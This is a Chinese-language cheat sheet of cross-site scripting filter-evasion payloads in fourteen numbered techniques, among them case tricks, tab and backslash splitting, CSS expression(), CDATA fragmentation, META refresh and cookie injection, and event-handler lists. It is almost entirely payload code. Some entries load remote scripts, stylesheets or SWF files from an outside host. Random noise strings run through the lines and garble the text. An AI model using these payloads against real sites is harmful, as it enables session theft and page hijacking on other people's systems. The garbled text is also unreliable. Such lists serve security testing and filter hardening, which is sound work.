1. 改变字符大小写
9 a$ ^& ^3 q8 o5 n& _8 j
3 q/ h5 C0 r0 h! G # b t6 l( R! n6 E
D- h$ G/ V7 ^& a& Z+ ~' e
<sCript>alert(‘d’)</scRipT>. Q* o% u5 W4 C2 `
9 X$ ]: D4 W0 y% v5 e8 F
2. 利用多加一些其它字符来规避Regular Expression的检查
: @+ i7 s0 ~! w0 p9 a% j8 N d8 z
<<script>alert(‘c’)//<</script>
' B2 X- C6 G7 D: ^# q* |- G
3 K* `7 X* y5 u" ] <SCRIPT a=">" SRC="t.js"></SCRIPT>& j8 _) j' r5 I. @9 @. N5 ~
: A0 w2 c9 E1 M' H, N8 B9 | <SCRIPT =">" SRC="t.js"></SCRIPT>5 [2 ^" |9 I: A( s5 B: P
! Z* T* J- t$ \% m1 P
<SCRIPT a=">" ” SRC="t.js"></SCRIPT>
O7 M" h* F+ t* k
* N8 j$ J1 R( j, E& S$ ]0 c# ^ <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
/ E4 K# H- G4 ~4 [6 y5 E$ h* \! b$ W
<SCRIPT a=`>` SRC="t.js"></SCRIPT>; k9 ?' o2 ?. l
4 a7 ^8 n% ]- \3 [3 `/ f, ^0 Q
<SCRIPT a=">’>" SRC="t.js"></SCRIPT>
4 w* e$ p7 I g7 h2 }5 R0 M$ c8 D5 Y3 e; [
3. 以其它扩展名取代.js$ q5 u. y; X% C) {7 k
; S& n6 ^' V" j C$ v: r3 e
<script src="bad.jpg"></script>; W, j- B+ Q2 I2 G2 S
& w% R, l4 c1 }+ i: V3 @4. 将Javascript写在CSS档里6 Q+ Q, F& l" D' h/ m: e2 f$ ~6 V
" n4 C1 d, J) n* a5 J; @. t <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">9 Q1 _. J% S+ N0 W
7 e* p/ w4 ?: A* O3 V1 @ K/ v& F example:
# z* k! L2 T* U* m) d$ T5 [! i! m, {. I. d
body {: }( z- J* C) H0 i
% S3 m& ^& `3 k0 o" i m
background-image: url(‘javascript:alert("XSS");’)
2 }/ G- r1 L; W% C+ X6 N4 q5 T
1 z: h, w( @. t7 q. B8 t) Y a }
9 a8 Y U* |: }0 V& I# E2 o, t. [1 o$ K
5. 在script的tag里加入一些其它字符8 y# h& T7 B0 { k9 T3 A
& f1 R: \7 K( w* P
<SCRIPT/SRC="t.js"></SCRIPT>- q) e5 s% n- q* D0 O; }" _" M- B
# W- i( i# z0 f( L( x <SCRIPT/anyword SRC="t.js"></SCRIPT>9 V5 ?+ T3 Y: {+ [- P$ c8 k5 X
: K- Z, V+ X- c$ l
6. 使用tab或是new line来规避, m) }0 k" f( W4 u
8 U% k1 S3 I% m; T8 K+ E- T* z, U2 B
<img src="jav ascr ipt:alert(‘XSS3′)">* L3 d6 t, p C
\# `. T# X* S# z* |: f
<img src="jav ascr ipt:alert(‘XSS3′)">( o$ K# r6 _$ \7 E! U' e& U2 o
2 Y7 I& @; H, |+ \
<IMG SRC="jav ascript:alert(‘XSS’);">" t) |5 i! Z9 I( f7 q8 D7 w. V% u
2 B) s% j2 {% ~, h- T
-> tag
, X* S7 X [( j8 Y2 D8 z& a. s, Z& `4 r% c$ ?) C( |# c2 C
-> new line
# i& ]1 c/ x! D$ ~: n6 n5 O; g" M* Z5 O& D- e, i
7. 使用"\"来规避
3 Z+ ^& C7 y4 ~9 [7 @* J4 @+ Z$ \; a# f+ K
<STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>6 S0 }0 H5 ^% @# Z7 b y" k
1 Y7 |8 L' ~0 |/ i ~0 n <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
" b6 m9 K- A4 D! C7 U" u, y; m. o: R5 @( V! H$ \, @
<IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">: n J6 g% W z" j, Y/ g
3 J& k- O# O7 M3 x4 `. V
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">3 i: W4 S% V2 _: t/ U
& V$ r- w& l1 b& c- y5 e
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>
6 H) O; m M4 l( E4 b% ]- L3 m' Y# m/ P3 F3 f8 ]% ~& |
8. 使用Hex encode来规避(也可能会把";"拿掉)
7 P, Z0 B/ z( `9 F8 H: C* s. X5 O
6 w4 g @, S' V2 T" }6 W% R <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));"># I( } V' C9 @- p# X- L3 X
. i" d& f$ J" | 原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">3 {3 z+ U' d# z: r, ?) u6 y
' ?/ Q! l% _) ^8 K7 b
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
( ^ }7 ]2 R- Z
2 z8 g: \7 Q, o6 ^% Z4 U 原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
2 A) C9 D( f9 x* ]. j2 C# x2 j/ N% R1 N6 N4 v. Y; n
9. script in HTML tag0 A6 e% k5 f8 O$ t$ s6 ~
' Z# v% F( K# N; N$ r
<body onload=」alert(‘onload’)」>
# U$ z( i$ B; L/ n3 R! l: X
0 t5 {2 _, w. R! l* g5 N onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
, d% F& t* b3 j% e6 S
+ P5 L* N* w- u% w3 p10. 在swf里含有xss的code# Q9 P9 ^ n5 F
0 M" \% Z; i' x3 s5 Z8 ^4 | <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
# Y4 j5 \" ~3 K# J" e' I- s8 `; b9 a6 A4 y
11. 利用CDATA将xss的code拆开,再组合起来。
0 J# H) i) h5 O3 [& M; h% V& ?$ Y5 @' f3 I1 S
<XML ID=I><X><C>
; z, v- s% C7 o+ r2 B; J" R) Q
# N |- ^% F) S; U3 s0 Q+ W <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>7 _2 }* c" G; G4 _ b
, c/ b3 r* Z7 D1 G* K: y2 P1 @& p7 v </C></X>
$ C0 {4 B9 |, r
( G& c: C6 c* Q, M, M3 n2 e </xml>
1 E5 d% r4 W6 u& p0 w+ ^
" M! n/ `/ v2 e. @ ]9 V <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>) O% d! u2 {/ u0 l/ _' c9 H
7 w7 {" a4 f: w% G! l
<XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
$ f$ G! [ F% G5 x% a* ^" M4 o w# n- Q4 V
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>9 K K+ _4 r; y( B1 \3 [& C+ [
$ I: b( \8 ^- d, C' r5 j6 K
12. 利用HTML+TIME。
& R3 Z2 u3 F3 Q& `/ e C# g
' `$ Q$ P0 E# S7 w! x2 R <HTML><BODY>
9 F% X) M! E( w7 s s3 r2 m' ]- O+ \% E B3 B* K, Q
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">( d, E) e( D1 X7 v0 ? D8 o G
: ] x1 ?1 p+ i: ]* A5 Q0 j. N7 I
<?import namespace="t" implementation="#default#time2">
5 a2 v5 l) j# A: \6 d$ v$ }. j* Y& K# R( a+ M0 l6 i" N
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">, ^0 F- J1 l/ { h9 {" _
1 _" V9 P/ B# p
</BODY></HTML># E& a+ w4 ~" |2 J" w
0 F2 b% w; x6 M- Y: j$ K, ]6 @, } D5 P4 }
13. 透过META写入Cookie。" s. Z/ B5 W& J2 u6 ?
; I0 F6 K0 L4 ^( v ]- V
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">
4 ?7 _. o L4 p% y. I3 j$ M6 }9 I/ S, E6 U
14. javascript in src , href , url' m/ A6 ]7 P. H
" I8 D0 ]( A! |; C- k+ J* i <IFRAME SRC=javascript:alert(’13′)></IFRAME>( y0 d3 {8 P) d( o0 P7 R
& j8 w# I2 J* H
<img src="javascript:alert(‘XSS3′)">
' g/ Z; `6 _2 E7 k9 d' ^
$ k4 i+ Q$ u/ q<IMG DYNSRC="javascript:alert(‘XSS20′)">
2 ?- N8 `$ {) W& }3 F4 z0 C8 s# {( H( k" T$ T5 i0 ^
<IMG LOWSRC="javascript:alert(‘XSS21′)">
% S4 T" y z% j3 u4 j9 Y, Q
; Q5 L/ t2 v# [, h8 d <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">4 q, `* `9 Y" ], k. q
- p: o& X7 k0 j <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>9 t/ ~9 X& [! y: c2 y+ J# p4 q# a
( e l9 O& y# e+ {/ \5 a, s8 X
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">
, r7 v8 x0 P! @5 V5 }/ |4 S4 G5 R8 o0 [& ~" b) I
<DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">0 a4 ~0 ]: J$ M
! J/ K% @6 p! M0 u: S/ m) g3 ^ <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}4 }) S u9 y3 S) s# H
1 X7 D& E; y1 a$ s' i1 l! A </STYLE><A CLASS=XSS></A>
/ T2 q- E/ ?6 Y* K" S" Q" H" i4 b& V o; c% J
<FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>4 U- a; }$ K) l7 y9 W. L7 `
) W6 V$ B' v3 a/ }3 M0 ] |